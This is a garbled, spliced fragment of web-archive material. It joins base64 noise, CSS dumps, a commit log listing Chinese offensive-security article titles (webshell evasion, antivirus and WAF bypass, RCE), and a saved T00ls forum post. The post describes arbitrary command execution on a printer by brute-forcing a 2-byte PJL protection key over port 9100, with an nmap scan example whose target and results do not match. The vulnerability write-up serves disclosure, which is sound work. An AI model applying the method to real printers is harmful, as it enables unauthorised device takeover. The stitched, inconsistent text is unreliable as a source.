SiVrmFwuv+GGG4ho//797e3tEyZMYLHCEydONDQ0DB8+vNM9snsgKCjIarUaDIaAgICkpKSwsDAiMhqNhYWFBoOB53m1Wp2enq5UKtkJ1+v1TqczICAgJSVFq9UajUZ2H2o0mvr6erFY3PGcNzQ02O12li6TyWw2GzuNEokkMjKyrq5OIpH0cDQlAADABf3ynWRdXZ1are4qn1qtrqur62rr1SoLAADXJvZtPBG1tra2tLQQEZu6QqfTsW/jAwMD5XK5y+WyWCxsLIzNZrNYLLW1tUajUSaT2e32nJycxsZGpVIpl8vr6upycnJ4ni8tLWVDfmJiYiwWS35+PqufqaysFIlEdru9rKyMhTZOnDjR1tYWFBTEOoacOXOm476ErwTcbvfJkyd1Op1MJuvTp4/XQRUVFe3evZs9fHbK6XRaf+Z2u9khNDQ0SCQSmUzW2NiYk5PT3t7eVfG8vLzy8nKr1apSqfR6/ZkzZ2pqavz8/CwWi06nI6L6+nqLxcJ+LTY3N1ssFqFvqW+sU1JycjIbixQYGDhkyBA27Mgrp0qlYm9YCIYRohU5OTnFxcVWq3Xw4MGDBw/23CSXyyUSCbugBoOhpqZGIpGIRKK8vLyKigqXyxUSEtLS0nL8+HGDweD7ulRXV7OuEwaD4ejRoxaLRSKRmM1m1ivHE7uXNBoNCxl4Naa2tvbMmTN6vV6lUjmdzoqKivPnzxORxWKxWCwlJSVut9vpdDY0NOTm5nrV3NbWdubMGYvFEh0dLRaLq6uri4qK5HI5u42lUinbF6uKHaCPm7aioqK0tNTpdIaGhlqt1tLSUtaXhBUvLS0ViUQul6umpubkyZMSiYTneZ1OV1JS4tmkhoaG06dPGwyG0NBQm81WVFRUXFxMRKdOnaqrq7Pb7ayLkPADJWCjAomIzbbL/mu1WtlJZsOvOu0j4+OGDwoKYgXtdrvVaiWiY8eOlZeXq9VqdqU8v2ZLSEhwuVwVFRX087B0pVLZaThGuAdqamra2to4jtPr9SdPnjQajVarNScnp6mpSSqVymQynU6Xk5PjdrtPnTrFwmEqlYr1BXM4HMJ9yP5BYCeZhaWEc04/jx+sra0lohMnTtTX1zudTpFIVFJSwrJ12kIAAIBe9EsfGYPBEBUV5TUxIcPzvJ+fH/tV2qmrVRYAAK5ZoaGhjY2Ner2e9YhJS0s7e/Zsc3MzG9Hg1dlB4O/vP3LkSKlUWltbywqmpKTwPH/s2DGTyWQ0GllEg3VbiIqKEolEfn5+wtiHYcOGqVSq/fv3s8wajWb48OFEJJVKGxsbCwsLWW8dr30JKXl5eW63OyAgYMiQIV4TqRCRy+US/tupiooK4XfW8OHD29vbbTabQqEYPXo0x3EHDhwwm81NTU0sVtWx8vr6eiLKysoKCQkpKCgoKyurqanJyMhgXQDYpLxEZLPZTCYTC7J0Zw4Ou93Owiv+/v5CotAGYWhwVVW
<div class=t_attach id=aimg_170631_menu style=position:absolute;z-index:301;opacity:1;left:203.07px;top:3877.66px;display:none> 
 (132.65 KB)
</div>
<p></p>
<h2>5.漏洞修复</h2>
<p>新版本已修复该漏洞</p>
<p>自评TCV:2</p></div>
</table>
</div>
</div>
</div>
</tr>
</table>
</div>
</div>
<div id=f_post class="mainbox viewthread" style=display:none!important>
<form method=post id=fastpostform action="post.php?action=reply&amp;fid=52&amp;tid=73632&amp;extra=page%3D1&amp;replysubmit=yes&amp;infloat=yes&amp;handlekey=fastpost" style=display:none!important>
<table cellspacing=0 cellpadding=0 style=display:none!important>
<tbody style=display:none!important><tr style=display:none!important>
<td class=postcontent style=display:none!important>
<div class=editor_tb style=display:none!important>
</div>
 
</td>
</tr>
</table>
</form>
</div>
</div>
<div id=immersive-translate-browser-popup style=color-scheme:initial;forced-color-adjust:initial;mask:initial;math-depth:initial;position:initial;position-anchor:initial;text-size-adjust:initial;appearance:initial;color:initial;font:initial;font-palette:initial;font-synthesis:initial;position-area:initial;text-orientation:initial;text-rendering:initial;text-spacing-trim:initial;-webkit-font-smoothing:initial;-webkit-locale:initial;-webkit-text-orientation:initial;-webkit-writing-mode:initial;writing-mode:initial;zoom:initial;accent-color:initial;place-content:initial;place-items:initial;place-self:initial;alignment-baseline:initial;anchor-name:initial;anchor-scope:initial;animation-composition:initial;animation:initial;app-region:initial;aspect-ratio:initial;backdrop-filter:initial;backface-visibility:initial;background:initial;background-blend-mode:initial;baseline-shift:initial;baseline-source:initial;block-size:initial;border-block:initial;border:initial;border-radius:initial;border-collapse:initial;border-end-end-radius:initial;border-end-start-radius:initial;border-inline:initial;border-start-end-radius:initial;border-start-start-radius:initial;inset:initial;box-decoration-break:initial;box-shadow:initial;box-sizing:initial;break-after:initial;break-before:initial;break-inside:initial;buffered-rendering:initial;caption-side:initial;caret-color:initial;clear:initial;clip:initial;clip-path:initial;clip-rule:initial;color-interpolation:initial;color-interpolation-filters:initial;color-rendering:initial;columns:initial;column-fill:initial;gap:initial;column-rule:initial;column-span:initial;contain:initial;contain-intrinsic-block-size:initial;contain-intrinsic-size:initial;contain-intrinsic-inline-size:initial;container:initial;content:initial;content-visibility:initial;counter-increment:initial;counter-reset:initial;counter-set:initial;cursor:initial;cx:initial;cy:initial;d:initial;display:none!important;dominant-baseline:initial;dynamic-range-limit:initial;empty-cells:initial;field-sizing:initial;fill:initial;fill-opacity:initial;fill-rule:initial;filter:initial;flex:initial;flex-flow:initial;float:initial;flood-color:initial;flood-opacity:initial;grid:initial;grid-area:initial;height:initial;hyphenate-character:initial;hyphenate-limit-chars:initial;hyphens:initial;image-orientation:initial;image-rendering:initial;initial-letter:initial;inline-size:initial;inset-block:initial;inset-inline:initial;interpolate-size:initial;isolation:initial;letter-spacing:initial;lighting-color:initial;line-break:initial;list-style:initial;margin-block:initial;margin:initial;margin-inline:initial;marker:initial;mask-type:initial;math-shift:initial;math-style:initial;max-block-size:initial;max-height:initial;max-inline-size:initial;max-width:initial;min-block-size:initial;min-height:initial;min-inline-size:initial;min-width:initial;mix-blend-mode:initial;object-fit:initial;object-position:initial;object-view-box:initial;offset:initial;opacity:initial;order:initial;orphans:initial;outline:initial;outline-offset:initial;overflow-anchor:initial;overflow-block:initial;overflow-clip-margin:initial;overflow-inline:initial;overflow-wrap:initial;overflow:initial;overlay:initial;overscroll-behavior-block:initial;overscroll-behavior-inline:initial;overscroll-behavior:initial;padding-block:initial;padding:initial;padding-inline:initial;page:initial;page-orientation:initial;paint-order:initial;perspective:initial;perspective-origin:initial;pointer-events:initial;position-try:initial;position-visibility:initial;print-color-adjust:initial;quotes:initial;r:initial;resize:initial;rotate:initial;ruby-align:initial;ruby-position:initial;rx:initial;ry:initial;scale:initial;scroll-behavior:initial;scroll-initial-target:initial;scroll-margin-block:initial;scroll-margin:initial;scroll-margin-inline:initial;scroll-marker-group:initial;scroll-padding-block:initial;scroll-padding:initial;scroll-padding-inline:initial;scroll-snap-align:initial;scroll-snap-stop:initial;scroll-snap-type:initial;scroll-timeline:initial;scrollbar-color:initial;scrollbar-gutter:initia
 * Pico.css v1.5.6 (https://picocss.com)
 * Copyright 2019-2022 - Licensed under MIT
 */#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:0.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:0.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:0.5rem;--nav-link-spacing-vertical:0.5rem;--nav-link-spacing-horizontal:0.5rem;--form-label-font-weight:var(--font-weight);--transition:0.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media (min-width:576px){#mount{--font-size:17px}}@media (min-width:768px){#mount{--font-size:18px}}@media (min-width:992px){#mount{--font-size:19px}}@media (min-width:1200px){#mount{--font-size:20px}}@media (min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media (min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media (min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media (min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media (min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media (min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media (min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media (min-width:576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media (min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:0.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:0.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#F5F7F9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-c
-												update

添加如下文章
CNVD证书挖掘（两小时极速版）
KodExplorer系统(<=4.51.03) API 端点无限制上传漏洞解析
LMXCMS 任意文件删除到重装系统 getshell 组合拳学习
MCP Server 攻击面初探与思考
MSSQL · 实现分析 · SQL Server实现审计日志的方案探索
OGNL表达式注入高版本绕过分析
Tomcat解析XML引入的新颖webshell构造方式
Vite 任意文件读取漏洞(CVE-2025-30208)
Vite开发服务器任意文件读取漏洞分析复现（CVE-2025-31125）
VxWorks设备分析与漏洞挖掘
docker逃逸方式总结分享
o2oa＜=v9.1.3 前台RCE
【补天白帽黑客城市沙龙-西安站】c3p0新链探索—深入挖掘数据库连接池的安全隐患
【补天白帽黑客城市沙龙-西安站】巧用Chrome-CDP远程调用Debug突破JS逆向
一次漏洞挖掘过程中的SQL注入浅浅绕过记录
万字写AvBypass基础，看了你就入门了
上ORM也没用！手注击穿ORM到后台
从CVE-2025-30208到CVE-2025-31125再到CVE-2025-31486
从FastJ学习fastjson1.2.80反序列化
从JDBC MySQL不出网攻击到spring临时文件利用
从Todesk多个漏洞浅谈远程连接程序溯源反制
信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞
基于SimpleXMLElement class的免杀webshell
多条件触发的免杀 Webshell
大语言模型黑盒越狱攻击之模板补全
契约锁电子签章安全补丁绕过
契约锁电子签章系统 dbtest RCE简单分析
如何利用AI大模型辅助漏洞挖掘
安全对抗：如何在哥斯拉二开中无缝集成 PHP 免杀&伪造阿里云waf防检测
宏景人事管理系统漏洞挖掘与分析
实战Weevely管理工具免杀马研究即生成另类免杀马
小程序渗透记录 通过细节挖掘漏洞的艺术
手把手带你深入分析 Fastjson JDBC 调用链利用过程
探索SQL注入中数学函数的应用：绕过过滤、＂算＂出数据
攻防项目中的代码审计
未授权服务加固与泛解析字符绕过
泛微云桥20240725存在未授权文件上传fileUploadForCowork_fileUpload
浅谈AI部署场景下的web漏洞
浅谈常见edu漏洞，逻辑漏洞➡越权➡接管➡getshell，小白如何快速找准漏洞
深入Vite任意文件读取与分析复现
瑞星企业终端防病毒系统简单分析
第四期伏魔计划绕过php样本分享
绕过阿里云WAF进行MySQL手工注入实录
若依(RuoYi)框架漏洞战争手册
记一次信呼OA组合拳RCE漏洞审计过程
记一次帮丈母娘破解APP，满满的全是思路(flutter SSL校验绕过)
记一次旧言下单系统审计——前台注入突破360webscan限制getshell
都2025年了，这十大 LLM 安全工具你该关注了！
隧道代理攻防技术战争手册
飞塔防火墙漏洞深度利用及调试环境搭建

											
										
										
											2025-06-14 06:41:49 -07:00
+								<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns=http://www.w3.org/1999/xhtml style><!--
 								 Page saved with SingleFile
 								 url: https://www.t00ls.com/thread-73632-1-1.html
 								--><meta charset=utf-8>
 								<title>信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞 - 原创文章发布(Original Article) - T00ls | 低调求发展 - 潜心习安全</title>
 								<meta name=keywords content="T00ls.Com - 低调求发展 - 潜心习安全 - Focus On Cyber Security">
 								<meta name=description content=" T00ls 1.漏洞名称打印机9100 端口开启且 PJL 保护机制密钥易被暴力破解时，攻击者可发送 PJL 指令获取完全访问权限，进而执行任意命令。2.漏洞描述打印机 PJL 任意 ... - Discuz! Board">
 								<meta name=generator content="Discuz! 1.0">
 								<meta name=author content="Discuz! Team and Comsenz UI Team">
 								<meta name=copyright content="2001-2009 Comsenz Inc.">
 								<meta name=MSSmartTagsPreventParsing content=True>
 								<meta http-equiv=MSThemeCompatible content=Yes>
 								<meta http-equiv=X-UA-Compatible content="IE=9">
 								<link rel=archives title=T00ls href=https://www.t00ls.com/archiver/>
 								<style>*{word-wrap:break-word}html,body{border:0!important}body{background:#EEEEEE;text-align:center}body,td{color:#444;font:12px/1.6em Verdana,Helvetica,Arial,sans-serif}body,ul,li,p,h1,h2{margin:0;padding:0}ul li{list-style:none}a{text-decoration:none}a:hover{text-decoration:underline}table{empty-cells:show;border-collapse:collapse}.s_clear:after{content:".";display:block;height:0;clear:both;visibility:hidden}.s_clear{zoom:1}.wrap{text-align:left;margin:0 auto}#wrap{padding-bottom:10px;min-height:450px;border:5px solid #333333;background-color:#FFF;clear:both}.wrap{width:98%}.mainbox table{width:100%}@keyframes myanimation{0%{color:white}25%{color:yellow}50%{color:green}75%{color:brown}100%{color:red}}#wrap{border-bottom:5px solid}</style><style>.threadfix{padding-bottom:0!important;min-height:300px!important}.viewthread table{table-layout:fixed}.viewthread td.postcontent{vertical-align:top;border:none;overflow:hidden}.viewthread td.postcontent{padding:0 15px}.postmessage{clear:left}.postmessage *{line-height:normal}.postmessage h1,.postmessage h2{margin:8px 0;font-size:1.17em}.postmessage h1 a{font-weight:400;color:#444}#threadtitle{margin-bottom:8px;border-bottom:1px dashed #999}.defaultpost{padding-bottom:1em}.t_msgfont{font-size:14px;line-height:1.6em}.t_msgfont *{line-height:normal}.t_msgfont ul{margin-left:14px}.t_msgfont li{margin-left:2em}.t_msgfont ul li{list-style-type:disc}.t_attach{border:1px solid #999;background:#FFF;font-size:12px;padding:5px}.t_attach{width:130px}.t_msgfontfix table{margin-left:1px}.t_msgfontfix{min-height:100px}</style>
 								<style>.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;color:#24292e;font-family:-apple-system,system-ui,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none}.markdown-body *{box-sizing:border-box}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body p,.markdown-body ul,.markdown-body ol{margin-top:0;margin-bottom:16px}.markdown-body h2{margin-top:24px;margin-bottom:16px;font-weight:600;line-height:1.25}.markdown-body h2{padding-bottom:0.3em;font-size:1.5em;border-bottom:1px solid #eaecef}.markdown-body ul,.markdown-body ol{padding-left:2em}.markdown-body li+li{margin-top:0.25em}.markdown-body img{box-sizing:content-box;background-color:#fff}</style>
 								<style>.hljs{display:block;overflow-x:auto;padding:0.5em;background:#23241f!important;white-space:pre-wrap;word-wrap:break-word}.hljs{color:#f8f8f2!important}.hljs-number{color:#ae81ff}.hljs-string{color:#e6db74}.hljs-meta{color:#75715e}</style>
 								<style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@media screen and (max-width:768px){}@keyframes image-loading-rotate{from{transform:rotate(360deg)}to{transform:rotate(0deg)}}</style><meta name=referrer content=no-referrer><link type=image/x-icon rel="shortcut icon" href="data:image/x-icon;base64,AAABAAEAEBAAAAEAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAA9PT3/fX19/319ff99fX3/fX19/319ff96enr/cXFx/319ff99fX3/fX19/319ff99fX3/fX19/319ff89PT3/fX19////////////////////////////rq6u/xYWFv/b29v/////////////////////////////////fX19/319ff///////////////////////////8vLy/8BAQH/RUVF//39/f///////////////////////////319ff99fX3////////////////////////////8/Pz/NjY2/wgICP/t7e3///////////////////////////99fX3/fX19/////////////////////////////////7i4uP8AAAD/pqam////////////////////////////fX19/319ff/////////////////////////////////+/v7/TU1N/yMjI//4+Pj//////////////////////319ff99fX3//////////////////////////////////////9/f3/8QEBD/jIyM//////////////////////99fX3/fX19////////////////////////////////////////////m5ub/xEREf/l5eX/////////////////fX19/319ff////////////////////////////////////////////////9TU1P/W1tb/////////////////319ff99fX3//////8/Pz/8uLi7/kZGR/+vr6///////////////////////7Ozs/yMjI/+0tLT///////////99fX3/fX19///////X19f/AQEB/xMTE/9gYGD/pKSk/9jY2P/09PT//v7+///////MzMz/HR0d/+jo6P//////fX19/319ff//////+/v7/ysrK/8AAAD/AAAA/wAAAP8AAAD/DAwM/x0dHf8qKir/Hx8f/wMDA/+2trb//////319ff99fX3////////////Q0ND/Ly8v/wEBAf8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8PDw//8vLy//////99fX3/fX19//////////////////z8/P/U1NT/np6e/3Z2dv9aWlr/SEhI/0ZGRv9cXFz/srKy////////////fX19/319ff///////////////////////////////////////////////////////////////////////////319ff89PT3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff99fX3/fX19/319ff89PT3/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="><style>.sf-hidden{display:none!important}</style><link rel=canonical href=https://www.t00ls.com/thread-73632-1-1.html><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"></head>
 								<body id=viewthread>
 								<div id=append_parent style=display:none!important></div><div id=ajaxwaitid style=display:none!important></div>
 								<div id=header style=display:none!important>
 								</div>
 								<div id=nav style=display:none!important>
 								 » » 信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞</div>
 								<div id=ad_text style=display:none!important></div>
 								<div id=wrap class="wrap s_clear threadfix">
 								<div class=forumcontrol style=display:none!important>
 								</div>
 								<div id=postlist class="mainbox viewthread"><div id=post_1216668><table id=pid1216668 summary=pid1216668 cellspacing=0 cellpadding=0>
 								<tbody><tr>
 								<td class=postauthor rowspan=2 style=display:none!important>
 								</td>
 								<td class=postcontent>
 								<div id=threadstamp style=display:none!important></div><div class=postinfo style=display:none!important>
 								</div>
 								<div class=defaultpost>
 								<div id=ad_thread2_0 style=display:none!important></div><div id=ad_thread3_0 style=display:none!important></div><div id=ad_thread4_0 style=display:none!important></div>
 								<div class="postmessage firstpost">
 								<div id=threadtitle>
 								<em style=display:none!important>所需阅读权限 10</em><h1><a href="https://www.t00ls.com/forumdisplay.php?fid=52&amp;filter=type&amp;typeid=1">[【原创】]</a> 信创打印机 - 某国产打印机存在基于打印机语言的命令任意执行漏洞</h1>
 								</div>
 								<div class=t_msgfontfix>
 								<table cellspacing=0 cellpadding=0><tbody><tr><td class=t_msgfont id=postmessage_1216668><div class=markdown-body><h2>1.漏洞名称</h2>
 								<p>打印机9100 端口开启且 PJL 保护机制密钥易被暴力破解时，攻击者可发送 PJL 指令获取完全访问权限，进而执行任意命令。</p>
 								<h2>2.漏洞描述</h2>
 								<p>打印机 PJL 任意命令执行漏洞中，打印机 9100 端口开启，攻击者可向其发送 PJL 指令请求设备名称。因 PJL 保护机制密钥仅由 2 字节存储，能被暴力破解，攻击者借此可获取完全访问权限，进而肆意执行任意命令 。</p>
 								<h2>3. 漏洞分析</h2>
 								<ul>
 								<li>端口扫描 - 例子</li>
 								</ul>
 								<pre><code class="language-shell hljs"><span class=hljs-meta>$</span><span class=bash> nmap -Pn 192.168.1.1 </span>
 								Starting Nmap 7.94 ( https://nmap.org ) at 2025-05-22 14:30 CST
 								Nmap scan results for printer-ip (192.168.1.100)
 								Host is up (0.042s latency).
 								PORT     STATE SERVICE
 /tcp open  lpd
 								| lpd-version:
 								|   SERVER: HP LaserJet Pro MFP M428fdw
 								|_  VERSION: HP PJL 5.0 (PostScript Level 3)
 								MAC Address: XX:XX:XX:XX:XX:XX (HP Inc.)</code></pre>
 								<ul>
 								<li>分析报文</li>
 								</ul>
 								<p>在默认 Windows 系统中，可通过添加打印机功能输入 IP 地址连接网络打印机，并打印测试页。此时使用 Wireshark 抓取网络接口数据，可分析终端与打印机之间交互的通信报文，如协议类型、数据传输内容等细节。</p>
 								<p>
 								<span style=position:absolute;display:none id=attach_170632></span>
 								<img src="data:image/png;base64,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